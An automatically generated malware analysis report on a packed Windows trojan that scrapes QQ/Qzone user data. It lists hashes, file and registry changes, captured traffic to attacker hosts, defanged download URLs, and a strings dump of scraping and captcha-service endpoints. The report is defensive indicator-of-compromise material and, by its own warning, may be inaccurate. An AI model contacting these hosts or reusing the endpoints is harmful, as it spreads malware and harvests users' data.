Gen.Variant.Strictor.85399_e57f1bfc87

by malwarelabrobot on June 22nd, 2015 in Malware Descriptions.

Gen:Variant.Strictor.85399 (B) (Emsisoft), Gen:Variant.Strictor.85399 (AdAware), Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: e57f1bfc8727e723e1e054ab1c1b604d
SHA1: d3578f66a4edc5d90744eb97de09826b1ee99488
SHA256: 365e914f0487de35406932dfe001f667133a0b59ccbb4ec17bb87a3b87dde3c2
SSDeep: 49152:L7a/WjUo/YVGFNauDCcci8FaociAoujObHxM1fhjpRl JbzoE4t 08Cc:L7aK/YVxwrciGaoc5oui7xM1J7l qyR1
Size: 2704984 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: ASPackv212, UPolyXv05_v6
Company: no certificate found
Created at: 2015-05-13 22:31:00
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:312

Mutexes

The following mutexes were created/opened:

RasPbFile
ini_read_write
ShimCacheMutex

File activity

The process %original file name%.exe:312 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\sqlite3.dll (1825 bytes)
C:\qyd1.edb (260 bytes)
C:\qyd.db-journal (1594 bytes)
C:\qyd.db (149 bytes)
C:\qyd2.enx (1 bytes)

The Trojan deletes the following file(s):

C:\qyd.db-journal (0 bytes)

Registry activity

The process %original file name%.exe:312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 91 0C 33 E5 1C 5A D6 49 33 A2 39 62 EF 86 33"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"

Dropped PE files

MD5 File path
d6580cc678d0a80596628cd3cab61ff1 c:\sqlite3.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 1495040 477184 5.54482 2df1d03837f8eda055db1aeda1c4fc06
.rdata 1499136 3969024 1871872 5.54508 b65e0bacce99825e449f72327415d6f9
.data 5468160 401408 32768 5.5395 788b268682a039752376bf6f115785e5
.rsrc 5869568 327680 16896 4.87096 09d660a79281a20da1f4b4074aecdfee
.aspack 6197248 303104 299520 2.8513 7996f58eb3fcde6ee9389b91969b0625
.adata 6500352 4096 0 0 d41d8cd98f00b204e9800998ecf8427e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://65770.vhost8.cloudvhost.cn/gx1.txt
hxxp://www.qqydw.com/gx1.txt 122.114.121.8


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /gx1.txt HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: VVV.qqydw.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sun, 21 Jun 2015 06:31:17 GMT
Server: Apache
Last-Modified: Sat, 20 Jun 2015 13:33:46 GMT
ETag: "3225a4-25b4-518f31706e280"
Accept-Ranges: bytes
Content-Length: 9652
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8
QQ.............[1:8.1|hXXp://qyddl.oss-cn-qingdao.aliyuncs.com/QQç%A
9ºé—´è®¿å®¢æå–器.rar]..QQ...
..........[2:8.5|hXXp://qyddl.oss-cn-qingdao.aliyuncs.com/QQ资%
E6–™æŸ¥è¯¢å™¨.rar]..QQ..................(......)
.[4:7.8|hXXp://qyddl.oss-cn-qingdao.aliyuncs.com/QQ直接%
E5Š å¥½å‹è¿‡æ»¤.rar].....................
[6:1.0|hXXp://pan.baidu.com/s/1o6wX5xw]......QQ.........[7:1.3|hXXp://
pan.baidu.com/s/1o6wX5xw]..QQ..................(......).[8:7.8|hXXp://
qyddl.oss-cn-qingdao.aliyuncs.com/QQ直接加å¥%
BD友过滤.exe]..QQ.................[9:1.1|hXXp://p
an.baidu.com/s/1o6wX5xw]..QQ.............[10:3.11|hXXp://qyddl.oss-cn-
qingdao.aliyuncs.com/QQ群成员提取%E
5™¨.exe]..QQ.................[11:1.6|hXXp://pan.baidu.com/s/1o6wX5
xw]..QQ.................[31:7.0|hXXp://qyddl.oss-cn-qingdao.aliyuncs.c
om/精准QQ号码采集专%E
5®¶.exe]..QQ................QQ.........[13:1.2|hXXp://VVV.qqydw.co
m]......QQ.............[14:2.0|hXXp://pan.baidu.com/s/1o6wX5xw]..QQ...
............[15:2.1|hXXp://pan.baidu.com/s/1o6wX5xw]..QQ..............
...[16:3.0|hXXp://pan.baidu.com/s/1o6wX5xw]..QQ.................[17:3.
0|hXXp://pan.baidu.com/s/1o6wX5xw]..QQ.................[18:1.5|hXXp://
VVV.qqydw.com]..QQ.................[19:1.2|hXXp://VVV.qqydw.com]..QQ..
...............[20:1.1|hXXp://VVV.qqydw.com]..QQ..................
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_312:

.text
`.rdata
@.data
.rsrc
.aspack
.adata
t%SVh
t$(SSh
u.hX%
~%UVW
u$SShe
ole32.dll
FastVerCode.dll
UUWiseHelper.dll
dc.dll
atl.dll
gdiplus.dll
shlwapi.dll
sqlite3.dll
kernel32.dll
GdiPlus.dll
user32.dll
Psapi.dll
Kernel32.dll
ADVAPI32.DLL
secur32.dll
advapi32.dll
shell32.dll
Rasapi32.dll
ntdll.dll
GetProcessHeap
CreateIoCompletionPort
ShellExecuteA
uu_loginA
ReportError
uu_reportError
sqlite3_errcode
sqlite3_open_v2
sqlite3_close
sqlite3_rekey
sqlite3_key
sqlite3_free
sqlite3_errmsg
sqlite3_libversion
sqlite3_busy_timeout
sqlite3_exec
sqlite3_prepare_v2
sqlite3_step
sqlite3_column_int
sqlite3_finalize
sqlite3_get_table
sqlite3_free_table
sqlite3_interrupt
sqlite3_changes
GdiplusShutdown
sqlite3_bind_blob
sqlite3_data_count
sqlite3_reset
sqlite3_column_count
sqlite3_column_name
sqlite3_column_decltype
sqlite3_column_text
sqlite3_column_blob
sqlite3_column_int64
sqlite3_column_double
sqlite3_sql
sqlite3_column_bytes
EnumChildWindows
GetProcessHeaps
{B6F7542F-B8FE-46a8-9605-98856A687097}
{E5000198-4471-40e2-92BC-D0BA075BDBB2}
{A068799B-7551-46b9-8CA8-EEF8357AFEA4}
.idata
.edata
P.vmp0
`.vmp1
.reloc
P.rsrc
version.dll
1e.ro4A
oleaut32.dll
H0.gW
comctl32.dll
gdi32.dll
d.jF/"
r#'%C
6.Xdp
g|$^.Cn
>.bM8
>Z.Ye
w4R`$p%s*
f.zo~L^
wsock32.dll
Ë.L@
l.sQ{
c-t{.FF
b#I".wM
e.ENZ
xip.tu
@>.vO
%FX2Fsi
qKT.jLka
3.LD7
Uq
G,.gd
<.cFF=j
&8.XMj
$~O.Ba
)].Wd
/_{M%U
Q%s6|
lVfeVg
 !%uO
mh.ud
m%Csn%
kq84.QaI
)f%fg
.SuDYw
K)`p.frC
*%s!%
aR.dDb&<y
.xk 4g
RegCloseKey
)%S{.
'U}.Ue
l%S(8x$!(
1L%UJ
.vtbw
.iA5N
yyhKa%S
d.Zd=#R
x0r%F{
.IPi)
Vj.jH
>M%X9
/8[<{~@ 
bc.lTk
ks_GetMsg
kssPlugin.dll
tole32.dll
KEY: {
{3F4DACA4-160D-11D2-A8E9-00104B365C9F}
hXXp://cgi.find.qq.com/q
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.59 QQ/6.4.12593.201 Safari/537.36
hXXp://find.qq.com/index.html?version=1&im_version=5395&width=910&height=610&search_target=0
num=20&page=0&sessionid=0&keyword=&agerg=
&sessionid=1&keyword=&agerg=
"nick":"
\IP.qyd
hXXp://VVV.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&rsv_idx=1&tn=baidu&wd=ip查询
hXXp://VVV.ip138.com/ips138.asp
qq.com/
zone.qq.com/cgi-bin/friendshow/cgi_get_visitor_simple?uin=
hXXp://g.
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36
hXXp://b1.qzone.qq.com/cgi-bin/blognew/blog_output_data?uin=
&unikey=
zone.qq.com/cgi-bin/likes/get_like_list_app?uin=
hXXp://users.
&url=
zone.qq.com/cgi-bin/blognew/blog_get_interaction?uin=
hXXp://b.
hXXp://user.qzone.qq.com/
"opnick":"
zone.qq.com/cgi-bin/blognew/get_comment_list?uin=
hXXp://b11.
zone.qq.com/cgi-bin/blognew/blog_output_data?uin=
hXXp://b1.
hXXp://ctc.qzs.qq.com/qzone/newblog/blogcanvas.html
hXXp://xiaoqu.qq.com/cgi-bin/bar/category_list
hXXp://xiaoqu.qq.com/mobile/index.html?_lv=28743&_wv=1027&_bid=128
Mozilla/5.0 (Linux; Android 4.4.2; GT-N7100 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 V1_AND_SQ_5.4.0_218_YYB_D QQ/5.4.1.2395 NetType/WIFI
hXXp://cgi.find.qq.com/
hXXp://find.qq.com/index.html?version=1&im_version=5365&width=910&height=610&search_target=0
QQ.txt
:hXXp://VVV.eyuyan.cc
zone.qq.com/cgi-bin/new/get_msgb?uin=
hXXp://m.
"nickname":"
hXXp://xiaoqu.qq.com/cgi-bin/bar/get_gbar_by_collction
hXXp://xiaoqu.qq.com/cgi-bin/bar/get_bar_list_by_category
@qq.com
%S4WD
hg%fpM
S.Ac9SR
0.I%3s
,wAe.kI
aiUy'4xu
%c*@j
.eH'y
{&%U)
lj%4U
xe%CNs
9F.cLe
hJK.ZH
O.qt0
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
798222986
hXXp://VVV.qqydw.com
hXXp://qqydw.com/sale.php?uid=5
hXXp://qqydw.com/xzzx.html
hXXp://
\sqlite3.dll
3.6.18
SQLite format 3
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYFcpD
KERNEL32.dll
sqlite3_aggregate_context
sqlite3_aggregate_count
sqlite3_auto_extension
sqlite3_backup_finish
sqlite3_backup_init
sqlite3_backup_pagecount
sqlite3_backup_remaining
sqlite3_backup_step
sqlite3_bind_double
sqlite3_bind_int
sqlite3_bind_int64
sqlite3_bind_null
sqlite3_bind_parameter_count
sqlite3_bind_parameter_index
sqlite3_bind_parameter_name
sqlite3_bind_text
sqlite3_bind_text16
sqlite3_bind_value
sqlite3_bind_zeroblob
sqlite3_blob_bytes
sqlite3_blob_close
sqlite3_blob_open
sqlite3_blob_read
sqlite3_blob_write
sqlite3_busy_handler
sqlite3_clear_bindings
sqlite3_collation_needed
sqlite3_collation_needed16
sqlite3_column_bytes16
sqlite3_column_database_name
sqlite3_column_database_name16
sqlite3_column_decltype16
sqlite3_column_name16
sqlite3_column_origin_name
sqlite3_column_origin_name16
sqlite3_column_table_name
sqlite3_column_table_name16
sqlite3_column_text16
sqlite3_column_type
sqlite3_column_value
sqlite3_commit_hook
sqlite3_complete
sqlite3_complete16
sqlite3_config
sqlite3_context_db_handle
sqlite3_create_collation
sqlite3_create_collation16
sqlite3_create_collation_v2
sqlite3_create_function
sqlite3_create_function16
sqlite3_create_module
sqlite3_create_module_v2
sqlite3_db_config
sqlite3_db_handle
sqlite3_db_mutex
sqlite3_db_status
sqlite3_declare_vtab
sqlite3_enable_load_extension
sqlite3_enable_shared_cache
sqlite3_errmsg16
sqlite3_expired
sqlite3_extended_errcode
sqlite3_extended_result_codes
sqlite3_file_control
sqlite3_get_autocommit
sqlite3_get_auxdata
sqlite3_global_recover
sqlite3_initialize
sqlite3_last_insert_rowid
sqlite3_libversion_number
sqlite3_limit
sqlite3_load_extension
sqlite3_malloc
sqlite3_memory_alarm
sqlite3_memory_highwater
sqlite3_memory_used
sqlite3_mprintf
sqlite3_mutex_alloc
sqlite3_mutex_enter
sqlite3_mutex_free
sqlite3_mutex_leave
sqlite3_mutex_try
sqlite3_next_stmt
sqlite3_open
sqlite3_open16
sqlite3_os_end
sqlite3_os_init
sqlite3_overload_function
sqlite3_prepare
sqlite3_prepare16
sqlite3_prepare16_v2
sqlite3_profile
sqlite3_progress_handler
sqlite3_randomness
sqlite3_realloc
sqlite3_release_memory
sqlite3_reset_auto_extension
sqlite3_result_blob
sqlite3_result_double
sqlite3_result_error
sqlite3_result_error16
sqlite3_result_error_code
sqlite3_result_error_nomem
sqlite3_result_error_toobig
sqlite3_result_int
sqlite3_result_int64
sqlite3_result_null
sqlite3_result_text
sqlite3_result_text16
sqlite3_result_text16be
sqlite3_result_text16le
sqlite3_result_value
sqlite3_result_zeroblob
sqlite3_rollback_hook
sqlite3_set_authorizer
sqlite3_set_auxdata
sqlite3_shutdown
sqlite3_sleep
sqlite3_snprintf
sqlite3_soft_heap_limit
sqlite3_sourceid
sqlite3_status
sqlite3_stmt_status
sqlite3_strnicmp
sqlite3_table_column_metadata
sqlite3_test_control
sqlite3_thread_cleanup
sqlite3_threadsafe
sqlite3_total_changes
sqlite3_trace
sqlite3_transfer_bindings
sqlite3_update_hook
sqlite3_user_data
sqlite3_value_blob
sqlite3_value_bytes
sqlite3_value_bytes16
sqlite3_value_double
sqlite3_value_int
sqlite3_value_int64
sqlite3_value_numeric_type
sqlite3_value_text
sqlite3_value_text16
sqlite3_value_text16be
sqlite3_value_text16le
sqlite3_value_type
sqlite3_version
sqlite3_vfs_find
sqlite3_vfs_register
sqlite3_vfs_unregister
sqlite3_vmprintf
sqlite3_win32_mbcs_to_utf8
%s\etilqs_
OsError 0x%x (%u)
unknown database %s
%s-mjX
922337203685477580
RowKey
keyinfo(%d
%s(%d)
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot %s savepoint - SQL statements in progress
cannot rollback transaction - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s
database table is locked: %s
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
invalid page number %d
2nd reference to page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
cannot open indexed column for writing
cannot open value of type %s
sqlite_stat1
SELECT idx, stat FROM %Q.sqlite_stat1
too many attached databases - max %d
database %s is already in use
Invalid key value
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
%s: %s.%s
%s: %s
sqlite3_extension_init
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s
database schema is locked: %s
sqlite3_get_table() called with two or more incompatible queries
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';'FROM sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
no such module: %s
vtable constructor failed: %s
vtable constructor did not declare schema: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
there is already another table or index with this name: %s
sqlite_
table %s may not be altered
view %s may not be altered
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
%s OR name=%Q
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE tbl=%Q
sqlite_detach
misuse of aggregate: %s()
invalid name: "%s"
not authorized to use function: %s
misuse of aliased aggregate %s
%s: %s.%s.%s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
sqlite_attach
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
no such collation sequence: %s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
%s %T cannot reference objects in database %s
view %s is circularly defined
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
DELETE FROM %s.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
indexed columns are not unique
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q
DELETE FROM %Q.sqlite_stat1 WHERE idx=%Q
a JOIN clause is required before %s
unable to identify the object to be reindexed
table %s may not be modified
cannot modify %s because it is a view
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
PRIMARY KEY must be unique
foreign_key_list
*** in database %s ***
unsupported encoding: %s
rekey
hexkey
hexrekey
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
%s:%d
no such index: %s
sqlite_subquery_%p_
%s.%s
no such table: %s
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
at most %d tables in a join
cannot use index: %s
TABLE %s
%s AS %s
%s WITH INDEX %s
%s VIA MULTI-INDEX UNION
%s USING PRIMARY KEY
%s VIRTUAL TABLE INDEX %d:%s
%s ORDER BY
table %s: xBestIndex returned an invalid plan
sqlite_version
sqlite_source_id
d-d-d d:d:d
d:d:d
d-d-d
unable to close due to unfinished backup operation
SQL logic error or missing database
large file support is disabled
unable to use function %s in the requested context
no such vfs: %s
sqlite_rename_table
sqlite_rename_trigger
%.*s"%w"%s
automatic extension loading failed: %s
no such table column: %s.%s
c%d%s
unknown tokenizer: %s
%s%s%Q
%s,%Q HIDDEN
%s,docid HIDDEN)
docid INTEGER PRIMARY KEY,
create table %_segments( blockid INTEGER PRIMARY KEY, block blob);
create table %_segdir( level integer, idx integer, start_block integer, leaves_end_block integer, end_block integer, root blob, primary key(level, idx));
%d %d %d %d
Error in optimize: %s
porter
CREATE TABLE x(%s
%s, %s
CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
PRAGMA %Q.page_size
%s {%s}
0&3*3.32363:3>3
1!2*232<2
C:\Windows\qqydw.ini
BFeUQy48sgDIgituHpLLjZpSFM99LRy5cgyfc2jZnBPXfs2bXCuDTPyRecN0KucEwKf1heFA4bVrg3yT45lkse/D0MebGxED/eMEmaLRA8jCQUC4a0vSDsfGFLgvYUnJhRssT6D8qhIBKCq3tm8nsux0QGJtS1vryWVq4x8uuKzXBfLxR5RnyAwimqrkz1IrVbmIueIPTNgKJUNuobkC/KDzpvVplDMOQLYlRDgXq1l/fPpgBzn8vM8TN698ao9rzXQh6zwhXnVKlqzm5vYf3ZsqTCx5RsuvlMWBPTpGbJ/DoKy6OVNdtPFVge1NrRTrE qD74RUBIw9KBQNBohq2pv69QekwgnzKQgP7uNePJysjqQc4o2cFA2KUJuMERdZNw9RSn8acmliXlb6wYGsg6zBlbGi86RUwq1OXi3AUan/iCU25icEkXwzFYR6aq07ddbdvfWztzH5SN76DgYF7s0I3PmEmzOYXKnl51lZTQoNGyrw8/GMAZqaS8HpyZMV9JacNBGVLdh1GBHcpJTdAWjHINn9F1Tkc0GFZaTTd4bBAzqqa8aIsUlVxhuKRWXwl8NTEQUtQCCJ1FpKv3p/2pTSxU28/SvEuk9zen0Jdqri3tOvI52dbF/8uhyHJPeVVPayPCtruRosJQ5zSiZbKALSshbqgClfDPBmXmLZMp5kDw2KXKiXratnmGZxPhpeAJxI4Makq210KZYcjhsH/7y2Zhw7BjqnmuTK9r53RppqCV4e0IdnraQz0xGlrpx6a2rcuUWm2KUbsS3t7o2GKZVdA3igPWDwU7m4ES6Tbm 6QqyxZ6zCuMlN7Z/kQN8pQrZxuHZOS7f3XQdG7c4aXWe0bZKaul2FvwJ8vN7r9vYS/I1pR5O6AjcyVqALs6IhNpqeAAGfB/8CM6zKz4mOafk2MHkcjXfNTo7g3uiOW3sgwS83oPWyUIEgbrA98NQ7rx19QqCduWyUD8uFMg/rmMJdcEivyNTtL 1MSE6c62XRuwnDsMIaJbMadQO28mnWQbkfDqYAqzLe/UMIclcevUsk ljHGsVNfgs/AJIul9Iup4SI9spHiXdTwiJEfYda9tidiYMJDCbSElQ01JIqoNyiQM6JhKbADW NLSJAwGIxF9JHRBTase IVZ8qtfhjfUGDDHp/64/1JnSKMgmmBG0GZQ93LqW3S0o2dtEjIIbrKeYN0nVAOD98TmsaaPXOIaLzsxI5eTQXoWmBvCoUod18iWA9cm8X6jtp744OxmkBCIzyGd/8/fVnuXtdDn5la9Heve8TbIx40H/doz26UEJkoi8Ee A0lyKMZzvf52tf0haJrjYLf6VFakw4d5/nNuqCiwkuBTxV43FM0jfTM2IyASsw1M6LT3RuE Dgdw6GJQav3PIcaX2FIP 3LMmyKs JssHRtEMYxbsWK ENrpWbtndIMjAqDCq65HlMS968j/w kdglMRCUnigeuKl208CkIBuGyFllo2KnZOmfyPjqrIeC9pzLSFQCaCBGtEzZ7d63qgkFPyNPtIgqNYwcHprANS3 ZWhQAzOWoVQhEwTGnd27OAu6VIzf DNK3bhZS2aQR/iMIUxzzaSniTaAN7fjOU/qMH2zNrPbFkUFbv9ieR6inLg/kQgj SZ/rnMOncErz3u1r/5O8LucOo6NW2b1orPbIBGSeBa0ctOUQpjRtoe6TLGGb9LXULJmIqM=
/qyd.db
\qyd1.edb
\qyd2.enx
/qyd1.edb
/qyd2.enx
/qyd.db-journal
hXXp://VVV.qqydw.com/gx1.txt
hXXp://xiaoqu.qq.com/cgi-bin/bar/post/get_post_by_page
hXXp://xiaoqu.qq.com/mobile/index.html?_lv=28743&_wv=1027&_bid=128
hXXp://xiaoqu.qq.com/cgi-bin/bar/post/get_comment_by_page
"nick_name":"
hXXp://cgi.find.qq.com/qqfind/lbs/get_neighbor
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.59 QQ/6.6.13172.201 Safari/537.36
hXXp://find.qq.com/index.html?version=1&im_version=5377&width=910&height=610&search_target=0
li=8gCXOMgLXqaPcunO3ta3IDtlmgmVGyrDUcwiZ4xG6rfCMC7G1uqttnxz+NCb21hzrbmnIXcHMFNxr6Dy/0IlyA==&sign=69FDFC9541B460DC62E17E0BB1E3CB6C6BCDAFB60B987E544BBE1E9DB2F4797B98B54CE208892DC07969BC79032594908DFECDCA98F9AB33&offset=1&cnt=20&sessionid=0
cookies.txt
zone.qq.com/cgi-bin/friendshow/cgi_get_visitor_single?uin=
hXXp://ctc.qzs.qq.com/qzone/v5/owner2/ic/feeds.html
/mood/
&unikey=http://user.qzone.qq.com/
q.com/cgi-bin/emotion_cgi_getcmtreply_v6?need_private_comment=1&uin=
hXXp://taotao.
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
\qyd.db
@1970-01-01 08:00:00
hXXp://b11.qzone.qq.com/cgi-bin/blognew/get_abs?hostUin=
\LZConfig.ini
\FastVerCode.dll
@.reloc
NETAPI32.dll
MFC42.DLL
SHLWAPI.dll
WININET.dll
.PAVCObject@@
.PAVCException@@
.PAVCFileException@@
.PAVCInternetException@@
Content-Disposition: form-data; name="key"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MALN)
POST /api.php?mod=yzm&act=state HTTP/1.1
/api.php?mod=yzm&act=state
LZConfig.ini
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0)
HTTP/1.1
/api.php?mod=yzm&act=add
POST /api.php?mod=yzmm&act=result_new HTTP/1.1
/api.php?mod=yzmm&act=result_new
POST /api.php?mod=yzm&act=point HTTP/1.1
/api.php?mod=yzm&act=point
POST /api.php?mod=yzm&act=register HTTP/1.1
/api.php?mod=yzm&act=register
eee.hyslt.com
POST /api.php?mod=dmuser&act=yzm_error HTTP/1.1
/api.php?mod=dmuser&act=yzm_error
.hyslt.com
XXXXXX
hXXp://ip.qq.com/
POST /api.php?mod=yzm&act=server HTTP/1.1
/api.php?mod=yzm&act=server
<&<3<@<{<
\UUExtConfig.ini
CodeType=0\UUWiseHelper.dll
SSSSh
ByScreen.JPG
operator
GetProcessWindowStation
E:\work\UUWiseHelper
\UUWiseHelper.pdb
RegOpenKeyExW
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
urlmon.dll
dbghelp.dll
IPHLPAPI.DLL
WS2_32.dll
GetCPInfo
